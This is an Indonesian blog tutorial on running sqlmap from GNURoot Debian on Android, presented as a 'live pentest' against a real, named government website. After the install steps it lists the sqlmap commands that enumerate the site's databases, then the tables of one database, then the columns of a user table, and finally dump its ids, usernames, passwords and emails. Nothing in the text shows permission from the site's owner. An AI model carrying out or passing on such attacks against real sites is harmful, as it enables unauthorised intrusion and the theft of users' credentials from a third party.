» » Menjalankan sqlmap di Gnuroot

Menjalankan sqlmap di Gnuroot

Assalamualaikum wr.wb
Hai para sobat blog Master Linuxser Kali ini admin ngasi tutor  cara menjalankan SQLMap di android

Buat kalian yang belum punya GNURoot Debian download dlu di playstore pertama pastikan GNURoot terinstall Kemudian buka GNURoot Debian nya seperti pada gambar di bawah ini.



Alangkah baiknya buat folder khusus pentest dulu untuk menampung tool-tool hacking nanti nya dengan memasukkan perintah mkdir pentest kemudian tekan enter.



kemudian masukkan ke dalam folder pentest tadi dengan memasukkan perintah cd pentest kemudian tekan enter



kemudian install SQLMap dengan memasukkan perintah

  • git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap 

kemudian tekan enter




Biarkan proses instalasi berjalan



Setelah selesai masuk ke folder sqlmap dengan memasukkan perintah cd sqlmap kemudian tekan enter


beri hak akses dengan memasukkan perintah chmod 777 sqlmap.py kemudian tekan enter




kemudian update dulu sqlmap nya dengan memasukkan perintah ./sqlmap.py --update kemudian tekan enter




Mari kita coba langsung praktek live pentest dengan target nya

https://djk.esdm.go.id/index.php/detail-berita?ide=4325 dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 --dbs

kemudian tekan enter



biarkan proses scanning berjalan




Muncul wizard buat eksekusi jenis exploitasi nya ya tekan C kemudian tekan enter



biarkan proses injeksi SQL terus berjalan secara otomatis




dan database nya ketemu cek gambar dibawah biar jelas



Disini gw mau injeksi SQLnya di database djk3 untuk ngecek isi tabel SQL nya jadi perintah nya adalah

 ./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 --table

kemudian tekan enter



Setelah proses scanning selesai kemudian muncul lah tabel SQL nya dari database djk3



Disini gw mau injksi SQL di tabel djk3_user buat cek isi kolom nya dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user --columns

kemudian tekan enter



biarkan proses scanning dan injeksi berjalan


 Nah klo sudah ketemu kolom nya



kemudian gw mau dump isi kolom nya djk3_user tadi dengan cara memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user -C id,username,password,email --dump

kemudian tekan enter. 


Done 


Oke sekian dan terimakasih semoga dapat bermanfaat buat kalian semua